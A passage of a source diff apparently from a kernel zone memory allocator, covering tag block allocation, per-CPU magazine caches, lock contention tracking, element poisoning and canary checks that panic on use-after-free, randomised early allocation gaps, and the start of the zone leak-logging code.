ztLog2down(ztBlocks[p].size); + if (cq > ztFreeIndexMax) { + cq = ztFreeIndexMax; + } + if (!ztBlocks[p].free + || ((p != q) && (q != cq)) + || (ztBlocks[ztBlocks[p].next].prev != p) + || (ztBlocks[ztBlocks[p].prev].next != p)) { + kprintf("zterror at %d", p); + ztDump(FALSE); + kprintf("zterror at %d", p); + assert(FALSE); + } + continue; + } + kprintf("zt[%03d]%c %d, %d, %d\n", + p, ztBlocks[p].free ? 'F' : 'A', + ztBlocks[p].next, ztBlocks[p].prev, + ztBlocks[p].size); + p = ztBlocks[p].next; + if (p == q) { + break; + } + }while (p != q); + if (!sanity) { + printf("\n"); + } + } + if (!sanity) { + printf("-----------------------\n"); + } +} + + + +#define ZTBDEQ(idx) \ + ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next; \ + ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev; + +static void +ztFree(zone_t zone __unused, uint32_t index, uint32_t count) +{ + uint32_t q, w, p, size, merge; + + assert(count); + ztBlocksFree += count; + + // merge with preceding + merge = (index + count); + if ((merge < ztBlocksCount) + && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) + && ztBlocks[merge].free) { + ZTBDEQ(merge); + count += ztBlocks[merge].size; + } + + // merge with following + merge = (index - 1); + if ((merge > ztFreeIndexMax) + && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) + && ztBlocks[merge].free) { + size = ztBlocks[merge].size; + count += size; + index -= size; + ZTBDEQ(index); + } + + q = ztLog2down(count); + if (q > ztFreeIndexMax) { + q = ztFreeIndexMax; + } + w = q; + // queue in order of size + while (TRUE) { + p = ztBlocks[w].next; + if (p == q) { + break; + } + if (ztBlocks[p].size >= count) { + break; + } + w = p; + } + ztBlocks[p].prev = index; + ztBlocks[w].next = index; + + // fault in first + ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); + + // mark first & last with free flag and size + ztBlocks[index].free = TRUE; + ztBlocks[index].size = count; + ztBlocks[index].prev = w; + ztBlocks[index].next = p; + if (count > 1) { + index += (count - 1); + // fault in last + ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); + ztBlocks[index].free = TRUE; + ztBlocks[index].size = count; + } +} + +static uint32_t +ztAlloc(zone_t zone, uint32_t count) +{ + uint32_t q, w, p, leftover; + + assert(count); + + q = ztLog2up(count); + if (q > ztFreeIndexMax) { + q = ztFreeIndexMax; + } + do{ + w = q; + while (TRUE) { + p = ztBlocks[w].next; + if (p == q) { + break; + } + if (ztBlocks[p].size >= count) { + // dequeue, mark both ends allocated + ztBlocks[w].next = ztBlocks[p].next; + ztBlocks[ztBlocks[p].next].prev = w; + ztBlocks[p].free = FALSE; + ztBlocksFree -= ztBlocks[p].size; + if (ztBlocks[p].size > 1) { + ztBlocks[p + ztBlocks[p].size - 1].free = FALSE; + } + + // fault all the allocation + ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0); + // mark last as allocated + if (count > 1) { + ztBlocks[p + count - 1].free = FALSE; + } + // free remainder + leftover = ztBlocks[p].size - count; + if (leftover) { + ztFree(zone, p + ztBlocks[p].size - leftover, leftover); + } + + return p; + } + w = p; + } + q++; + }while (q <= ztFreeIndexMax); + + return -1U; +} + +__startup_func +static void +zone_tagging_init(vm_size_t max_zonemap_size) +{ + kern_return_t ret; + vm_map_kernel_flags_t vmk_flags; + uint32_t idx; + + // allocate submaps VM_KERN_MEMORY_DIAG + + zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t); + vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + vmk_flags.vmkf_permanent = TRUE; + ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size, + FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, + &zone_tagbase_map); + + if (ret != KERN_SUCCESS) { + panic("zone_init: kmem_suballoc failed"); + } + zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size); + + zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t); + vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + vmk_flags.vmkf_permanent = TRUE; + ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size, + FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, + &zone_tags_map); + + if (ret != KERN_SUCCESS) { + panic("zone_init: kmem_suballoc failed"); + } + zone_tags_max = zone_tags_min + round_page(zone_tags_map_size); + + ztBlocks = (ztBlock *) zone_tags_min; + ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock)); + + // initialize the qheads + lck_mtx_lock(&ztLock); + + ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0); + for (idx = 0; idx < ztFreeIndexCount; idx++) { + ztBlocks[idx].free = TRUE; + ztBlocks[idx].next = idx; + ztBlocks[idx].prev = idx; + ztBlocks[idx].size = 0; + } + // free remaining space + ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount); + + lck_mtx_unlock(&ztLock); +} + +static void +ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size) +{ + uint32_t * tagbase; + uint32_t count, block, blocks, idx; + size_t pages; + + pages = atop(size); + tagbase = ZTAGBASE(zone, mem); + + lck_mtx_lock(&ztLock); + + // fault tagbase + ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0); + + if (!zone->tags_inline) { + // allocate tags + count = (uint32_t)(size / zone_elem_size(zone)); + blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); + block = ztAlloc(zone, blocks); + if (-1U == block) { + ztDump(false); + } + assert(-1U != block); + } + + lck_mtx_unlock(&ztLock); + + if (!zone->tags_inline) { + // set tag base for each page + block *= ztTagsPerBlock; + for (idx = 0; idx < pages; idx++) { + vm_offset_t esize = zone_elem_size(zone); + tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize); + } + } +} + +static void +ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size) +{ + uint32_t * tagbase; + uint32_t count, block, blocks, idx; + size_t pages; + + // set tag base for each page + pages = atop(size); + tagbase = ZTAGBASE(zone, mem); + block = tagbase[0]; + for (idx = 0; idx < pages; idx++) { + tagbase[idx] = 0xFFFFFFFF; + } + + lck_mtx_lock(&ztLock); + if (!zone->tags_inline) { + count = (uint32_t)(size / zone_elem_size(zone)); + blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); + assert(block != 0xFFFFFFFF); + block /= ztTagsPerBlock; + ztFree(NULL /* zone is unlocked */, block, blocks); + } + + lck_mtx_unlock(&ztLock); +} + +uint32_t +zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size) +{ + simple_lock(&all_zones_lock, &zone_locks_grp); + + zone_index_foreach(idx) { + zone_t z = &zone_array[idx]; + if (!z->tags) { + continue; + } + if (tag_zone_index != z->tag_zone_index) { + continue; + } + + *elem_size = zone_elem_size(z); + simple_unlock(&all_zones_lock); + return idx; + } + + simple_unlock(&all_zones_lock); + + return -1U; +} + +#endif /* VM_MAX_TAG_ZONES */ +#endif /* !ZALLOC_TEST */ +#pragma mark zalloc helpers +#if !ZALLOC_TEST + +__pure2 +static inline uint16_t +zc_mag_size(void) +{ + return zc_magazine_size; +} + +__attribute__((noinline, cold)) +static void +zone_lock_was_contended(zone_t zone, zone_cache_t zc) +{ + lck_spin_lock_nopreempt(&zone->z_lock); + + /* + * If zone caching has been disabled due to memory pressure, + * then recording contention is not useful, give the system + * time to recover. + */ + if (__improbable(zone_caching_disabled)) { + return; + } + + zone->z_contention_cur++; + + if (zc == NULL || zc->zc_depot_max >= INT16_MAX * zc_mag_size()) { + return; + } + + /* + * Let the depot grow based on how bad the contention is, + * and how populated the zone is. + */ + if (zone->z_contention_wma < 2 * Z_CONTENTION_WMA_UNIT) { + if (zc->zc_depot_max * zpercpu_count() * 20u >= + zone->z_elems_avail) { + return; + } + } + if (zone->z_contention_wma < 4 * Z_CONTENTION_WMA_UNIT) { + if (zc->zc_depot_max * zpercpu_count() * 10u >= + zone->z_elems_avail) { + return; + } + } + if (!zc_grow_threshold || zone->z_contention_wma < + zc_grow_threshold * Z_CONTENTION_WMA_UNIT) { + return; + } + + zc->zc_depot_max++; +} + +static inline void +zone_lock_nopreempt_check_contention(zone_t zone, zone_cache_t zc) +{ + if (lck_spin_try_lock_nopreempt(&zone->z_lock)) { + return; + } + + zone_lock_was_contended(zone, zc); +} + +static inline void +zone_lock_check_contention(zone_t zone, zone_cache_t zc) +{ + disable_preemption(); + zone_lock_nopreempt_check_contention(zone, zc); +} + +static inline void +zone_unlock_nopreempt(zone_t zone) +{ + lck_spin_unlock_nopreempt(&zone->z_lock); +} + +static inline void +zone_depot_lock_nopreempt(zone_cache_t zc) +{ + hw_lock_bit_nopreempt(&zc->zc_depot_lock, 0, &zone_locks_grp); +} + +static inline void +zone_depot_unlock_nopreempt(zone_cache_t zc) +{ + hw_unlock_bit_nopreempt(&zc->zc_depot_lock, 0); +} + +static inline void +zone_depot_lock(zone_cache_t zc) +{ + hw_lock_bit(&zc->zc_depot_lock, 0, &zone_locks_grp); +} + +static inline void +zone_depot_unlock(zone_cache_t zc) +{ + hw_unlock_bit(&zc->zc_depot_lock, 0); +} + +const char * +zone_name(zone_t z) +{ + return z->z_name; +} + +const char * +zone_heap_name(zone_t z) +{ + if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) { + return kalloc_heap_names[z->kalloc_heap]; + } + return "invalid"; +} + +static uint32_t +zone_alloc_pages_for_nelems(zone_t z, vm_size_t max_elems) +{ + vm_size_t elem_count, chunks; + + elem_count = ptoa(z->z_percpu ? 1 : z->z_chunk_pages) / zone_elem_size(z); + chunks = (max_elems + elem_count - 1) / elem_count; + + return (uint32_t)MIN(UINT32_MAX, chunks * z->z_chunk_pages); +} + +static inline vm_size_t +zone_submaps_approx_size(void) +{ + vm_size_t size = 0; + + for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { + size += zone_submaps[idx]->size; + } + + return size; +} + +static void +zone_cache_swap_magazines(zone_cache_t cache) +{ + uint16_t count_a = cache->zc_alloc_cur; + uint16_t count_f = cache->zc_free_cur; + zone_element_t *elems_a = cache->zc_alloc_elems; + zone_element_t *elems_f = cache->zc_free_elems; + + z_debug_assert(count_a <= zc_mag_size()); + z_debug_assert(count_f <= zc_mag_size()); + + cache->zc_alloc_cur = count_f; + cache->zc_free_cur = count_a; + cache->zc_alloc_elems = elems_f; + cache->zc_free_elems = elems_a; +} + +/*! + * @function zone_magazine_load + * + * @brief + * Cache the value of @c zm_cur on the cache to avoid a dependent load + * on the allocation fastpath. + */ +static void +zone_magazine_load(uint16_t *count, zone_element_t **elems, zone_magazine_t mag) +{ + z_debug_assert(mag->zm_cur <= zc_mag_size()); + *count = mag->zm_cur; + *elems = mag->zm_elems; +} + +/*! + * @function zone_magazine_replace + * + * @brief + * Unlod a magazine and load a new one instead. + */ +static zone_magazine_t +zone_magazine_replace(uint16_t *count, zone_element_t **elems, + zone_magazine_t mag) +{ + zone_magazine_t old; + + old = (zone_magazine_t)((uintptr_t)*elems - + offsetof(struct zone_magazine, zm_elems)); + old->zm_cur = *count; + z_debug_assert(old->zm_cur <= zc_mag_size()); + zone_magazine_load(count, elems, mag); + + return old; +} + +static zone_magazine_t +zone_magazine_alloc(zalloc_flags_t flags) +{ + return zalloc_ext(zc_magazine_zone, zc_magazine_zone->z_stats, + flags | Z_ZERO); +} + +static void +zone_magazine_free(zone_magazine_t mag) +{ + zfree_ext(zc_magazine_zone, zc_magazine_zone->z_stats, mag); +} + +static void +zone_enable_caching(zone_t zone) +{ + zone_cache_t caches; + + caches = zalloc_percpu_permanent_type(struct zone_cache); + zpercpu_foreach(zc, caches) { + zone_magazine_load(&zc->zc_alloc_cur, &zc->zc_alloc_elems, + zone_magazine_alloc(Z_WAITOK | Z_NOFAIL)); + zone_magazine_load(&zc->zc_free_cur, &zc->zc_free_elems, + zone_magazine_alloc(Z_WAITOK | Z_NOFAIL)); + STAILQ_INIT(&zc->zc_depot); + } + + if (os_atomic_xchg(&zone->z_pcpu_cache, caches, release)) { + panic("allocating caches for zone %s twice", zone->z_name); + } +} + +bool +zone_maps_owned(vm_address_t addr, vm_size_t size) +{ + return from_zone_map(addr, size, ZONE_ADDR_NATIVE); +} + +void +zone_map_sizes( + vm_map_size_t *psize, + vm_map_size_t *pfree, + vm_map_size_t *plargest_free) +{ + vm_map_size_t size, free, largest; + + vm_map_sizes(zone_submaps[0], psize, pfree, plargest_free); + + for (uint32_t i = 1; i <= zone_last_submap_idx; i++) { + vm_map_sizes(zone_submaps[i], &size, &free, &largest); + *psize += size; + *pfree += free; + *plargest_free = MAX(*plargest_free, largest); + } +} + +__attribute__((always_inline)) +vm_map_t +zone_submap(zone_t zone) +{ + return zone_submaps[zone->z_submap_idx]; +} + +unsigned +zpercpu_count(void) +{ + return zpercpu_early_count; +} + +int +track_this_zone(const char *zonename, const char *logname) +{ + unsigned int len; + const char *zc = zonename; + const char *lc = logname; + + /* + * Compare the strings. We bound the compare by MAX_ZONE_NAME. + */ + + for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) { + /* + * If the current characters don't match, check for a space in + * in the zone name and a corresponding period in the log name. + * If that's not there, then the strings don't match. + */ + + if (*zc != *lc && !(*zc == ' ' && *lc == '.')) { + break; + } + + /* + * The strings are equal so far. If we're at the end, then it's a match. + */ + + if (*zc == '\0') { + return TRUE; + } + } + + return FALSE; +} + +#if DEBUG || DEVELOPMENT + +vm_size_t +zone_element_info(void *addr, vm_tag_t * ptag) +{ + vm_size_t size = 0; + vm_tag_t tag = VM_KERN_MEMORY_NONE; + struct zone *src_zone; + + if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) || + from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) { + src_zone = &zone_array[zone_index_from_ptr(addr)]; +#if VM_MAX_TAG_ZONES + if (__improbable(src_zone->tags)) { + tag = *ztSlot(src_zone, (vm_offset_t)addr) >> 1; + } +#endif /* VM_MAX_TAG_ZONES */ + size = zone_elem_size(src_zone); + } else { +#if CONFIG_GZALLOC + gzalloc_element_size(addr, NULL, &size); +#endif /* CONFIG_GZALLOC */ + } + *ptag = tag; + return size; +} + +#endif /* DEBUG || DEVELOPMENT */ + +/* The backup pointer is stored in the last pointer-sized location in an element. */ +__header_always_inline vm_offset_t * +get_primary_ptr(vm_offset_t elem) +{ + return (vm_offset_t *)elem; +} + +__header_always_inline vm_offset_t * +get_backup_ptr(vm_offset_t elem, vm_size_t elem_size) +{ + return (vm_offset_t *)(elem + elem_size - sizeof(vm_offset_t)); +} + +#endif /* !ZALLOC_TEST */ +#pragma mark Zone poisoning/zeroing and early random +#if !ZALLOC_TEST + +#define ZONE_ENTROPY_CNT 2 +static struct zone_bool_gen { + struct bool_gen zbg_bg; + uint32_t zbg_entropy[ZONE_ENTROPY_CNT]; +} zone_bool_gen[MAX_CPUS]; + +/* + * Initialize zone poisoning + * called from zone_bootstrap before any allocations are made from zalloc + */ +__startup_func +static void +zp_bootstrap(void) +{ + char temp_buf[16]; + + /* + * Initialize canary random cookie. + * + * Make sure that (zp_canary ^ pointer) have non zero low bits (01) + * different from ZONE_POISON (11). + * + * On LP64, have (zp_canary ^ pointer) have the high bits equal 0xC0FFEE... + */ + static_assert(ZONE_POISON % 4 == 3); + zp_canary = (uintptr_t)early_random(); +#if __LP64__ + zp_canary &= 0x000000fffffffffc; + zp_canary |= 0xc0ffee0000000001 ^ 0xffffff0000000000; +#else + zp_canary &= 0xfffffffc; + zp_canary |= 0x00000001; +#endif + + /* -zp: enable poisoning for every alloc and free */ + if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) { + zp_factor = 1; + } + + /* -no-zp: disable poisoning */ + if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) { + zp_factor = 0; + printf("Zone poisoning disabled\n"); + } + + zpercpu_foreach_cpu(cpu) { + random_bool_init(&zone_bool_gen[cpu].zbg_bg); + } +} + +static inline uint32_t +zone_poison_count_init(zone_t zone) +{ + return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^ + (mach_absolute_time() & 0x7); +} + +/* + * Zero the element if zone has z_free_zeroes flag set else poison + * the element if zs_poison_seqno hits 0. + */ +static zprot_mode_t +zfree_clear_or_poison(zone_t zone, vm_offset_t addr, vm_offset_t elem_size) +{ + if (zone->z_free_zeroes) { + if (zone->z_percpu) { + zpercpu_foreach_cpu(i) { + bzero((void *)(addr + ptoa(i)), elem_size); + } + } else { + bzero((void *)addr, elem_size); + } + return ZPM_ZERO; + } + + zprot_mode_t poison = ZPM_AUTO; +#if ZALLOC_ENABLE_POISONING + if (__improbable(zp_factor == 1)) { + poison = ZPM_POISON; + } else if (__probable(zp_factor != 0)) { + uint32_t *seqnop = &zpercpu_get(zone->z_stats)->zs_poison_seqno; + uint32_t seqno = os_atomic_load(seqnop, relaxed); + if (seqno == 0) { + os_atomic_store(seqnop, zone_poison_count_init(zone), relaxed); + poison = ZPM_POISON; + } else { + os_atomic_store(seqnop, seqno - 1, relaxed); + } + } + if (poison == ZPM_POISON) { + /* memset_pattern{4|8} could help make this faster: */ + for (size_t i = 0; i < elem_size / sizeof(vm_offset_t); i++) { + ((vm_offset_t *)addr)[i] = ZONE_POISON; + } + } else { + /* + * Set a canary at the extremities. + * + * Zero first zp_min_size bytes of elements that aren't being + * poisoned. + * + * Element size is larger than zp_min_size in this path, + * zones with smaller elements have z_free_zeroes set. + */ + *get_primary_ptr(addr) = zp_canary ^ (uintptr_t)addr; + bzero((void *)addr + sizeof(vm_offset_t), + zp_min_size - sizeof(vm_offset_t)); + *get_backup_ptr(addr, elem_size) = zp_canary ^ (uintptr_t)addr; + + poison = ZPM_CANARY; + } +#endif /* ZALLOC_ENABLE_POISONING */ + + return poison; +} + +#if ZALLOC_ENABLE_POISONING + +__abortlike +static void +zalloc_uaf_panic(zone_t z, uintptr_t elem, size_t size, zprot_mode_t zpm) +{ + uint32_t esize = (uint32_t)zone_elem_size(z); + uint32_t first_offs = ~0u; + uintptr_t first_bits = 0, v; + char buf[1024]; + int pos = 0; + const char *how; + +#if __LP64__ +#define ZPF "0x%016lx" +#else +#define ZPF "0x%08lx" +#endif + + buf[0] = '\0'; + + if (zpm == ZPM_CANARY) { + how = "canaries"; + + v = *get_primary_ptr(elem); + if (v != (elem ^ zp_canary)) { + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: got "ZPF", want "ZPF" (xor: "ZPF")", + 0, v, (elem ^ zp_canary), (v ^ elem ^ zp_canary)); + if (first_offs > 0) { + first_offs = 0; + first_bits = v; + } + } + + v = *get_backup_ptr(elem, esize); + if (v != (elem ^ zp_canary)) { + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: got "ZPF", want "ZPF" (xor: "ZPF")", + esize - (int)sizeof(v), v, (elem ^ zp_canary), + (v ^ elem ^ zp_canary)); + if (first_offs > esize - sizeof(v)) { + first_offs = esize - sizeof(v); + first_bits = v; + } + } + + for (uint32_t o = sizeof(v); o < zp_min_size; o += sizeof(v)) { + if ((v = *(uintptr_t *)(elem + o)) == 0) { + continue; + } + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: "ZPF, o, v); + if (first_offs > o) { + first_offs = o; + first_bits = v; + } + } + } else if (zpm == ZPM_ZERO) { + how = "zero"; + + for (uint32_t o = 0; o < size; o += sizeof(v)) { + if ((v = *(uintptr_t *)(elem + o)) == 0) { + continue; + } + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: "ZPF, o, v); + if (first_offs > o) { + first_offs = o; + first_bits = v; + } + } + } else { + how = "poison"; + + for (uint32_t o = 0; o < size; o += sizeof(v)) { + if ((v = *(uintptr_t *)(elem + o)) == ZONE_POISON) { + continue; + } + pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n" + "%5d: "ZPF" (xor: "ZPF")", + o, v, (v ^ ZONE_POISON)); + if (first_offs > o) { + first_offs = o; + first_bits = v; + } + } + } + + (panic)("[%s%s]: element modified after free " + "(off:%d, val:"ZPF", sz:%d, ptr:%p, prot:%s)%s", + zone_heap_name(z), zone_name(z), + first_offs, first_bits, esize, (void *)elem, how, buf); + +#undef ZPF +} + +static void +zalloc_validate_element_zero(zone_t zone, vm_offset_t elem, vm_size_t size) +{ + if (memcmp_zero_ptr_aligned((void *)elem, size)) { + zalloc_uaf_panic(zone, elem, size, ZPM_ZERO); + } + if (!zone->z_percpu) { + return; + } + for (size_t i = zpercpu_count(); --i > 0;) { + elem += PAGE_SIZE; + if (memcmp_zero_ptr_aligned((void *)elem, size)) { + zalloc_uaf_panic(zone, elem, size, ZPM_ZERO); + } + } +} + +#if __arm64__ || __arm__ +typedef __attribute__((ext_vector_type(2))) vm_offset_t zpair_t; +#else +typedef struct { + vm_offset_t x; + vm_offset_t y; +} zpair_t; +#endif + + +__attribute__((noinline)) +static void +zalloc_validate_element_poison(zone_t zone, vm_offset_t elem, vm_size_t size) +{ + vm_offset_t p = elem; + vm_offset_t end = elem + size; + + const zpair_t poison = { ZONE_POISON, ZONE_POISON }; + zpair_t a, b; + + a.x = *(const vm_offset_t *)p; + a.y = *(const vm_offset_t *)(end - sizeof(vm_offset_t)); + + a.x ^= poison.x; + a.y ^= poison.y; + + /* + * align p to the next double-wide boundary + * align end to the previous double-wide boundary + */ + p = (p + sizeof(zpair_t) - 1) & -sizeof(zpair_t); + end &= -sizeof(zpair_t); + + if ((end - p) % (2 * sizeof(zpair_t)) == 0) { + b.y = 0; + b.y = 0; + } else { + end -= sizeof(zpair_t); + b.x = ((zpair_t *)end)[0].x ^ poison.x; + b.y = ((zpair_t *)end)[0].y ^ poison.y; + } + + for (; p < end; p += 2 * sizeof(zpair_t)) { + a.x |= ((zpair_t *)p)[0].x ^ poison.x; + a.y |= ((zpair_t *)p)[0].y ^ poison.y; + b.x |= ((zpair_t *)p)[1].x ^ poison.x; + b.y |= ((zpair_t *)p)[1].y ^ poison.y; + } + + a.x |= b.x; + a.y |= b.y; + + if (a.x || a.y) { + zalloc_uaf_panic(zone, elem, size, ZPM_POISON); + } +} + +static void +zalloc_validate_element(zone_t zone, vm_offset_t elem, vm_size_t size, + zprot_mode_t zpm) +{ + vm_offset_t *primary = get_primary_ptr(elem); + vm_offset_t *backup = get_backup_ptr(elem, size); + +#if CONFIG_GZALLOC + if (zone->gzalloc_tracked) { + return; + } +#endif /* CONFIG_GZALLOC */ + + if (zone->z_free_zeroes) { + return zalloc_validate_element_zero(zone, elem, size); + } + + switch (zpm) { + case ZPM_AUTO: + if (*backup == 0) { + size -= sizeof(vm_size_t); + return zalloc_validate_element_zero(zone, elem, size); + } + if (*backup == ZONE_POISON) { + size -= sizeof(vm_size_t); + return zalloc_validate_element_poison(zone, elem, size); + } + OS_FALLTHROUGH; + + case ZPM_CANARY: + if ((*primary ^ zp_canary) != elem || (*backup ^ zp_canary) != elem) { + zalloc_uaf_panic(zone, elem, size, ZPM_CANARY); + } + *primary = *backup = 0; + size = zp_min_size; + OS_FALLTHROUGH; + + case ZPM_ZERO: + return zalloc_validate_element_zero(zone, elem, size); + + case ZPM_POISON: + return zalloc_validate_element_poison(zone, elem, size); + } +} + +#endif /* ZALLOC_ENABLE_POISONING */ +#if ZALLOC_EARLY_GAPS + +__attribute__((noinline)) +static void +zone_early_gap_drop(int n) +{ + while (n-- > 0) { + zone_t zone0 = &zone_array[0]; + struct zone_page_metadata *meta = NULL; + vm_offset_t addr; + uint16_t pages; + vm_map_t map; + + lck_mtx_lock(&zone_metadata_region_lck); + + if (!zone_pva_is_null(zone0->z_pageq_va)) { + meta = zone_meta_queue_pop_native(zone0, + &zone0->z_pageq_va, &addr); + map = zone_submaps[meta->zm_chunk_len]; + pages = meta->zm_alloc_size; + __builtin_bzero(meta, sizeof(struct zone_page_metadata)); + } + + lck_mtx_unlock(&zone_metadata_region_lck); + + if (!meta) { + break; + } + + kmem_free(map, addr, ptoa(pages)); + } +} + +static void +zone_early_gap_add(zone_t z, uint16_t pages) +{ + struct zone_page_metadata *meta = NULL; + zone_t zone0 = &zone_array[0]; + kern_return_t kr; + vm_offset_t addr; + + kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO | KMA_VAONLY; + if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL && + z->kalloc_heap != KHEAP_ID_NONE) { + kmaflags |= KMA_KHEAP; + } + + kr = kernel_memory_allocate(zone_submap(z), &addr, ptoa(pages), 0, + kmaflags, VM_KERN_MEMORY_ZONE); + + if (kr != KERN_SUCCESS) { + panic("unable to allocate early gap (%d pages): %d", pages, kr); + } + + zone_meta_populate(addr, ptoa(pages)); + + meta = zone_meta_from_addr(addr); + meta->zm_alloc_size = pages; + meta->zm_chunk_len = z->z_submap_idx; + + lck_mtx_lock(&zone_metadata_region_lck); + zone_meta_queue_push(zone0, &zone0->z_pageq_va, meta); + lck_mtx_unlock(&zone_metadata_region_lck); +} + +/* + * Roughly until pd1 is made, introduce random gaps + * between allocated pages. + * + * This way the early boot allocations are not in a completely + * predictible order and relative position. + * + * Those gaps are returned to the maps afterwards. + * + * We abuse the zone 0 (which is unused) "va" pageq to remember + * those ranges. + */ +__attribute__((noinline)) +static void +zone_allocate_random_early_gap(zone_t z) +{ + int16_t pages = early_random() % 16; + + /* + * 6% of the time: drop 2 gaps + * 25% of the time: drop 1 gap + * 37% of the time: do nothing + * 18% of the time: add 1 gap + * 12% of the time: add 2 gaps + */ + if (pages > 10) { + zone_early_gap_drop(pages == 15 ? 2 : 1); + } + if (pages < 5) { + /* values are 6 through 16 */ + zone_early_gap_add(z, 6 + 2 * pages); + } + if (pages < 2) { + zone_early_gap_add(z, 6 + early_random() % 16); + } +} + +static inline void +zone_cleanup_early_gaps_if_needed(void) +{ + if (__improbable(!zone_pva_is_null(zone_array[0].z_pageq_va))) { + zone_early_gap_drop(10); + } +} + +#endif /* ZALLOC_EARLY_GAPS */ + +static void +zone_early_scramble_rr(zone_t zone, zone_stats_t zstats) +{ + int cpu = cpu_number(); + zone_stats_t zs = zpercpu_get_cpu(zstats, cpu); + uint32_t bits; + + bits = random_bool_gen_bits(&zone_bool_gen[cpu].zbg_bg, + zone_bool_gen[cpu].zbg_entropy, ZONE_ENTROPY_CNT, 8); + + zs->zs_alloc_rr += bits; + zs->zs_alloc_rr %= zone->z_chunk_elems; +} + +#endif /* !ZALLOC_TEST */ +#pragma mark Zone Leak Detection +#if !ZALLOC_TEST + +/* + * Zone leak debugging code + * + * When enabled, this code keeps a log to track allocations to a particular zone that have not + * yet been freed. Examining this log will reveal the source of a zone leak. The log is allocated + * only when logging is enabled, so there is no effect on the system when it's turned off. Logging is + * off by default. + * + * Enable the logging via the boot-args. Add the parameter "zlog=" to boot-args where + * is the name of the zone you wish to log. + * + * This code only tracks one zone, so you need to identify which one is leaking first. + * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone + * garbage collector. Note that the zone name printed in the panic message is not necessarily the one + * containing the leak. So do a zprint from gdb and locate the zone with the bloated size. This + * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test. The + * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs. + * See the help in the kgmacros for usage info. + * + * + * Zone corruption logging + * + * Logging can also be used to help identify the source of a zone corruption. First, identify the zone + * that is being corrupted, then add "-zc zlog=" to the boot-args. When -zc is used in conjunction + * with zlog, it changes the logging style to track both allocations and frees to the zone. So when the + * corruption is detected, examining the log will show you the stack traces of the callers who last allocated + * and freed any particular element in the zone. Use the findelem kgmacro with the address of the element that's been + * corrupted to examine its history. This should lead to the source of the corruption. + */ + +/* Returns TRUE if we rolled over the counter at factor */ +__header_always_inline bool +sample_counter(volatile uint32_t *count_p, uint32_t factor) +{ + uint32_t old_count, new_count = 0; + if (count_p != NULL) { + os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, { + new_count = old_count + 1; + if (new_count >= factor) { + new_count = 0; + } + }); + } + + return new_count == 0; +} + +#if ZONE_ENABLE_LOGGING +/* Log allocations and frees to help debug a zone element corruption */ +static TUNABLE(bool, corruption_debug_flag, "-zc", false); + +#define MAX_NUM_ZONES_ALLOWED_LOGGING 10 /* Maximum 10 zones can be logged at once */ + +static int max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING; +static int num_zones_logged = 0; + +/* + * The number of records in the log is configurable via the zrecs parameter in boot-args. Set this to + * the number of records you want in the log. For example, "zrecs=10" sets it to 10 records. Since this + * is the number of stacks suspected of leaking, we don't need many records. + */ + +#if defined(__LP64__) +#define ZRECORDS_MAX 2560 /* Max records allowed in the log */ +#else +#define ZRECORDS_MAX 1536 /* Max records allowed in the log */ +#endif +#define ZRECORDS_DEFAULT 1024 /* default records in log if zrecs is not specificed in boot-args */ + +static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT); + +static void +zone_enable_logging(zone_t z) +{ + z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH, + (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */); + + if (z->zlog_btlog) { + printf("zone: logging started for zone %s%s\n", + zone_heap_name(z), z->z_name); + } else { + printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n"); + z->zone_logging = false; + } +} + +/** + * @function zone_setup_logging + * + * @abstract + * Optionally sets up a zone for logging. + * + * @discussion + * We recognized two boot-args: + * + * zlog= + * zrecs= + * + * The 